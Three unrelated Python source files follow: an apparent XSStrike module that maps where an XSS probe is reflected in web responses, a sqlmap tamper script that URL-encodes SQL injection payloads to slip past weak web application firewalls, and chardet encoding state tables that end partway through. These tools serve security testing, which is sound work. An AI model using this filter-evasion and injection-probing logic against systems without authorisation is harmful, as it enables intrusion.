import re

from core.config import badTags, xsschecker
from core.utils import isBadContext, equalize, escaped, extractScripts


def htmlParser(response, encoding):
    rawResponse = response  # raw response returned by requests
    response = response.text  # response content
    if encoding:  # if the user has specified an encoding, encode the probe in that
        response = response.replace(encoding(xsschecker), xsschecker)
    reflections = response.count(xsschecker)
    position_and_context = {}
    environment_details = {}
    clean_response = re.sub(r"<!--[.\s\S]*?-->", "", response)
    script_checkable = clean_response
    for script in extractScripts(script_checkable):
        occurences = re.finditer(r"(%s.*?)$" % xsschecker, script)
        if occurences:
            for occurence in occurences:
                thisPosition = occurence.start(1)
                position_and_context[thisPosition] = "script"
                environment_details[thisPosition] = {}
                environment_details[thisPosition]["details"] = {"quote": ""}
                for i in range(len(occurence.group())):
                    currentChar = occurence.group()[i]
                    if currentChar in ("/", "'", "`", '"') and not escaped(
                        i, occurence.group()
                    ):
                        environment_details[thisPosition]["details"][
                            "quote"
                        ] = currentChar
                    elif currentChar in (")", "]", "}", "}") and not escaped(
                        i, occurence.group()
                    ):
                        break
                script_checkable = script_checkable.replace(xsschecker, "", 1)
    if len(position_and_context) < reflections:
        attribute_context = re.finditer(
            r"<[^>]*?(%s)[^>]*?>" % xsschecker, clean_response
        )
        for occurence in attribute_context:
            match = occurence.group(0)
            thisPosition = occurence.start(1)
            parts = re.split(r"\s", match)
            tag = parts[0][1:]
            for part in parts:
                if xsschecker in part:
                    Type, quote, name, value = "", "", "", ""
                    if "=" in part:
                        quote = re.search(r'=([\'`"])?', part).group(1)
                        name_and_value = part.split("=")[0], "=".join(
                            part.split("=")[1:]
                        )
                        if xsschecker == name_and_value[0]:
                            Type = "name"
                        else:
                            Type = "value"
                        name = name_and_value[0]
                        value = (
                            name_and_value[1].rstrip(">").rstrip(quote).lstrip(quote)
                        )
                    else:
                        Type = "flag"
                    position_and_context[thisPosition] = "attribute"
                    environment_details[thisPosition] = {}
                    environment_details[thisPosition]["details"] = {
                        "tag": tag,
                        "type": Type,
                        "quote": quote,
                        "value": value,
                        "name": name,
                    }
    if len(position_and_context) < reflections:
        html_context = re.finditer(xsschecker, clean_response)
        for occurence in html_context:
            thisPosition = occurence.start()
            if thisPosition not in position_and_context:
                position_and_context[occurence.start()] = "html"
                environment_details[thisPosition] = {}
                environment_details[thisPosition]["details"] = {}
    if len(position_and_context) < reflections:
        comment_context = re.finditer(
            r"<!--[\s\S]*?(%s)[\s\S]*?-->" % xsschecker, response
        )
        for occurence in comment_context:
            thisPosition = occurence.start(1)
            position_and_context[thisPosition] = "comment"
            environment_details[thisPosition] = {}
            environment_details[thisPosition]["details"] = {}
    database = {}
    for i in sorted(position_and_context):
        database[i] = {}
        database[i]["position"] = i
        database[i]["context"] = position_and_context[i]
        database[i]["details"] = environment_details[i]["details"]

    bad_contexts = re.finditer(
        r"(?s)(?i)<(style|template|textarea|title|noembed|noscript)>[.\s\S]*(%s)[.\s\S]*</\1>"
        % xsschecker,
        response,
    )
    non_executable_contexts = []
    for each in bad_contexts:
        non_executable_contexts.append([each.start(), each.end(), each.group(1)])

    if non_executable_contexts:
        for key in database.keys():
            position = database[key]["position"]
            badTag = isBadContext(position, non_executable_contexts)
            if badTag:
                database[key]["details"]["badTag"] = badTag
            else:
                database[key]["details"]["badTag"] = ""
    return database



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

import string

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST


def dependencies():
    pass


def tamper(payload, **kwargs):
    """URL-encodes all characters in a given payload (not processing already
    encoded) (e.g. SELECT -> %53%45%4C%45%43%54)

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset
        * The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS

    >>> tamper('SELECT FIELD FROM%20TABLE')
    '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
    """

    retVal = payload

    if payload:
        retVal = ""
        i = 0

        while i < len(payload):
            if (
                payload[i] == "%"
                and (i < len(payload) - 2)
                and payload[i + 1 : i + 2] in string.hexdigits
                and payload[i + 2 : i + 3] in string.hexdigits
            ):
                retVal += payload[i : i + 3]
                i += 3
            else:
                retVal += "%%%.2X" % ord(payload[i])
                i += 1

    return retVal



######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
#   Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301  USA
######################### END LICENSE BLOCK #########################

from .enums import MachineState

# BIG5

BIG5_CLS = (
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 00 - 07    #allow 0x00 as legal value
    1,
    1,
    1,
    1,
    1,
    1,
    0,
    0,  # 08 - 0f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 10 - 17
    1,
    1,
    1,
    0,
    1,
    1,
    1,
    1,  # 18 - 1f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 20 - 27
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 28 - 2f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 30 - 37
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 38 - 3f
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 40 - 47
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 48 - 4f
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 50 - 57
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 58 - 5f
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 60 - 67
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 68 - 6f
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 70 - 77
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    1,  # 78 - 7f
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,  # 80 - 87
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,  # 88 - 8f
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,  # 90 - 97
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,  # 98 - 9f
    4,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # a0 - a7
    3,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # a8 - af
    3,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # b0 - b7
    3,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # b8 - bf
    3,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # c0 - c7
    3,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # c8 - cf
    3,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # d0 - d7
    3,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # d8 - df
    3,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # e0 - e7
    3,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # e8 - ef
    3,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # f0 - f7
    3,
    3,
    3,
    3,
    3,
    3,
    3,
    0,  # f8 - ff
)

BIG5_ST = (
    MachineState.ERROR,
    MachineState.START,
    MachineState.START,
    3,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,  # 00-07
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ERROR,  # 08-0f
    MachineState.ERROR,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,  # 10-17
)

BIG5_CHAR_LEN_TABLE = (0, 1, 1, 2, 0)

BIG5_SM_MODEL = {
    "class_table": BIG5_CLS,
    "class_factor": 5,
    "state_table": BIG5_ST,
    "char_len_table": BIG5_CHAR_LEN_TABLE,
    "name": "Big5",
}

# CP949

CP949_CLS = (
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    0,
    0,  # 00 - 0f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    0,
    1,
    1,
    1,
    1,  # 10 - 1f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 20 - 2f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 30 - 3f
    1,
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,  # 40 - 4f
    4,
    4,
    5,
    5,
    5,
    5,
    5,
    5,
    5,
    5,
    5,
    1,
    1,
    1,
    1,
    1,  # 50 - 5f
    1,
    5,
    5,
    5,
    5,
    5,
    5,
    5,
    5,
    5,
    5,
    5,
    5,
    5,
    5,
    5,  # 60 - 6f
    5,
    5,
    5,
    5,
    5,
    5,
    5,
    5,
    5,
    5,
    5,
    1,
    1,
    1,
    1,
    1,  # 70 - 7f
    0,
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,  # 80 - 8f
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,  # 90 - 9f
    6,
    7,
    7,
    7,
    7,
    7,
    7,
    7,
    7,
    7,
    7,
    7,
    7,
    8,
    8,
    8,  # a0 - af
    7,
    7,
    7,
    7,
    7,
    7,
    7,
    7,
    7,
    7,
    7,
    7,
    7,
    7,
    7,
    7,  # b0 - bf
    7,
    7,
    7,
    7,
    7,
    7,
    9,
    2,
    2,
    3,
    2,
    2,
    2,
    2,
    2,
    2,  # c0 - cf
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # d0 - df
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # e0 - ef
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    0,  # f0 - ff
)

CP949_ST = (
    # cls=    0      1      2      3      4      5      6      7      8      9  # previous state =
    MachineState.ERROR,
    MachineState.START,
    3,
    MachineState.ERROR,
    MachineState.START,
    MachineState.START,
    4,
    5,
    MachineState.ERROR,
    6,  # MachineState.START
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,  # MachineState.ERROR
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,  # MachineState.ITS_ME
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.START,
    MachineState.START,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.START,
    MachineState.START,
    MachineState.START,  # 3
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,  # 4
    MachineState.ERROR,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,  # 5
    MachineState.ERROR,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.START,
    MachineState.START,
    MachineState.START,  # 6
)

CP949_CHAR_LEN_TABLE = (0, 1, 2, 0, 1, 1, 2, 2, 0, 2)

CP949_SM_MODEL = {
    "class_table": CP949_CLS,
    "class_factor": 10,
    "state_table": CP949_ST,
    "char_len_table": CP949_CHAR_LEN_TABLE,
    "name": "CP949",
}

# EUC-JP

EUCJP_CLS = (
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,  # 00 - 07
    4,
    4,
    4,
    4,
    4,
    4,
    5,
    5,  # 08 - 0f
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,  # 10 - 17
    4,
    4,
    4,
    5,
    4,
    4,
    4,
    4,  # 18 - 1f
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,  # 20 - 27
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,  # 28 - 2f
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,  # 30 - 37
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,  # 38 - 3f
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,  # 40 - 47
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,  # 48 - 4f
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,  # 50 - 57
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,  # 58 - 5f
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,  # 60 - 67
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,  # 68 - 6f
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,  # 70 - 77
    4,
    4,
    4,
    4,
    4,
    4,
    4,
    4,  # 78 - 7f
    5,
    5,
    5,
    5,
    5,
    5,
    5,
    5,  # 80 - 87
    5,
    5,
    5,
    5,
    5,
    5,
    1,
    3,  # 88 - 8f
    5,
    5,
    5,
    5,
    5,
    5,
    5,
    5,  # 90 - 97
    5,
    5,
    5,
    5,
    5,
    5,
    5,
    5,  # 98 - 9f
    5,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # a0 - a7
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # a8 - af
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # b0 - b7
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # b8 - bf
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # c0 - c7
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # c8 - cf
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # d0 - d7
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # d8 - df
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # e0 - e7
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # e8 - ef
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # f0 - f7
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    5,  # f8 - ff
)

EUCJP_ST = (
    3,
    4,
    3,
    5,
    MachineState.START,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,  # 00-07
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,  # 08-0f
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.START,
    MachineState.ERROR,
    MachineState.START,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,  # 10-17
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.START,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    3,
    MachineState.ERROR,  # 18-1f
    3,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,  # 20-27
)

EUCJP_CHAR_LEN_TABLE = (2, 2, 2, 3, 1, 0)

EUCJP_SM_MODEL = {
    "class_table": EUCJP_CLS,
    "class_factor": 6,
    "state_table": EUCJP_ST,
    "char_len_table": EUCJP_CHAR_LEN_TABLE,
    "name": "EUC-JP",
}

# EUC-KR

EUCKR_CLS = (
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 00 - 07
    1,
    1,
    1,
    1,
    1,
    1,
    0,
    0,  # 08 - 0f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 10 - 17
    1,
    1,
    1,
    0,
    1,
    1,
    1,
    1,  # 18 - 1f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 20 - 27
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 28 - 2f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 30 - 37
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 38 - 3f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 40 - 47
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 48 - 4f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 50 - 57
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 58 - 5f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 60 - 67
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 68 - 6f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 70 - 77
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 78 - 7f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 80 - 87
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 88 - 8f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 90 - 97
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 98 - 9f
    0,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # a0 - a7
    2,
    2,
    2,
    2,
    2,
    3,
    3,
    3,  # a8 - af
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # b0 - b7
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # b8 - bf
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # c0 - c7
    2,
    3,
    2,
    2,
    2,
    2,
    2,
    2,  # c8 - cf
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # d0 - d7
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # d8 - df
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # e0 - e7
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # e8 - ef
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # f0 - f7
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    0,  # f8 - ff
)

EUCKR_ST = (
    MachineState.ERROR,
    MachineState.START,
    3,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,  # 00-07
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.START,
    MachineState.START,  # 08-0f
)

EUCKR_CHAR_LEN_TABLE = (0, 1, 2, 0)

EUCKR_SM_MODEL = {
    "class_table": EUCKR_CLS,
    "class_factor": 4,
    "state_table": EUCKR_ST,
    "char_len_table": EUCKR_CHAR_LEN_TABLE,
    "name": "EUC-KR",
}

# EUC-TW

EUCTW_CLS = (
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 00 - 07
    2,
    2,
    2,
    2,
    2,
    2,
    0,
    0,  # 08 - 0f
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 10 - 17
    2,
    2,
    2,
    0,
    2,
    2,
    2,
    2,  # 18 - 1f
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 20 - 27
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 28 - 2f
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 30 - 37
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 38 - 3f
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 40 - 47
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 48 - 4f
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 50 - 57
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 58 - 5f
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 60 - 67
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 68 - 6f
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 70 - 77
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 78 - 7f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 80 - 87
    0,
    0,
    0,
    0,
    0,
    0,
    6,
    0,  # 88 - 8f
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 90 - 97
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # 98 - 9f
    0,
    3,
    4,
    4,
    4,
    4,
    4,
    4,  # a0 - a7
    5,
    5,
    1,
    1,
    1,
    1,
    1,
    1,  # a8 - af
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # b0 - b7
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # b8 - bf
    1,
    1,
    3,
    1,
    3,
    3,
    3,
    3,  # c0 - c7
    3,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # c8 - cf
    3,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # d0 - d7
    3,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # d8 - df
    3,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # e0 - e7
    3,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # e8 - ef
    3,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # f0 - f7
    3,
    3,
    3,
    3,
    3,
    3,
    3,
    0,  # f8 - ff
)

EUCTW_ST = (
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.START,
    3,
    3,
    3,
    4,
    MachineState.ERROR,  # 00-07
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ITS_ME,
    MachineState.ITS_ME,  # 08-0f
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ERROR,
    MachineState.START,
    MachineState.ERROR,  # 10-17
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,  # 18-1f
    5,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.START,
    MachineState.ERROR,
    MachineState.START,
    MachineState.START,  # 20-27
    MachineState.START,
    MachineState.ERROR,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,  # 28-2f
)

EUCTW_CHAR_LEN_TABLE = (0, 0, 1, 2, 2, 2, 3)

EUCTW_SM_MODEL = {
    "class_table": EUCTW_CLS,
    "class_factor": 7,
    "state_table": EUCTW_ST,
    "char_len_table": EUCTW_CHAR_LEN_TABLE,
    "name": "x-euc-tw",
}

# GB2312

GB2312_CLS = (
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 00 - 07
    1,
    1,
    1,
    1,
    1,
    1,
    0,
    0,  # 08 - 0f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 10 - 17
    1,
    1,
    1,
    0,
    1,
    1,
    1,
    1,  # 18 - 1f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 20 - 27
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 28 - 2f
    3,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # 30 - 37
    3,
    3,
    1,
    1,
    1,
    1,
    1,
    1,  # 38 - 3f
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 40 - 47
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 48 - 4f
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 50 - 57
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 58 - 5f
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 60 - 67
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 68 - 6f
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 70 - 77
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    4,  # 78 - 7f
    5,
    6,
    6,
    6,
    6,
    6,
    6,
    6,  # 80 - 87
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,  # 88 - 8f
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,  # 90 - 97
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,  # 98 - 9f
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,  # a0 - a7
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,  # a8 - af
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,  # b0 - b7
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,  # b8 - bf
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,  # c0 - c7
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,  # c8 - cf
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,  # d0 - d7
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,  # d8 - df
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,  # e0 - e7
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,  # e8 - ef
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    6,  # f0 - f7
    6,
    6,
    6,
    6,
    6,
    6,
    6,
    0,  # f8 - ff
)

GB2312_ST = (
    MachineState.ERROR,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    3,
    MachineState.ERROR,  # 00-07
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ITS_ME,
    MachineState.ITS_ME,  # 08-0f
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ITS_ME,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.START,  # 10-17
    4,
    MachineState.ERROR,
    MachineState.START,
    MachineState.START,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,  # 18-1f
    MachineState.ERROR,
    MachineState.ERROR,
    5,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.ITS_ME,
    MachineState.ERROR,  # 20-27
    MachineState.ERROR,
    MachineState.ERROR,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,
    MachineState.START,  # 28-2f
)

# To be accurate, the length of class 6 can be either 2 or 4.
# But it is not necessary to discriminate between the two since
# it is used for frequency analysis only, and we are validating
# each code range there as well. So it is safe to set it to be
# 2 here.
GB2312_CHAR_LEN_TABLE = (0, 1, 1, 1, 1, 1, 2)

GB2312_SM_MODEL = {
    "class_table": GB2312_CLS,
    "class_factor": 7,
    "state_table": GB2312_ST,
    "char_len_table": GB2312_CHAR_LEN_TABLE,
    "name": "GB2312",
}

# Shift_JIS

SJIS_CLS = (
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 00 - 07
    1,
    1,
    1,
    1,
    1,
    1,
    0,
    0,  # 08 - 0f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 10 - 17
    1,
    1,
    1,
    0,
    1,
    1,
    1,
    1,  # 18 - 1f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 20 - 27
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 28 - 2f
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 30 - 37
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,  # 38 - 3f
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 40 - 47
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 48 - 4f
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 50 - 57
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 58 - 5f
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 60 - 67
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 68 - 6f
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    2,  # 70 - 77
    2,
    2,
    2,
    2,
    2,
    2,
    2,
    1,  # 78 - 7f
    3,
    3,
    3,
    3,
    3,
    2,
    2,
    3,  # 80 - 87
    3,
    3,
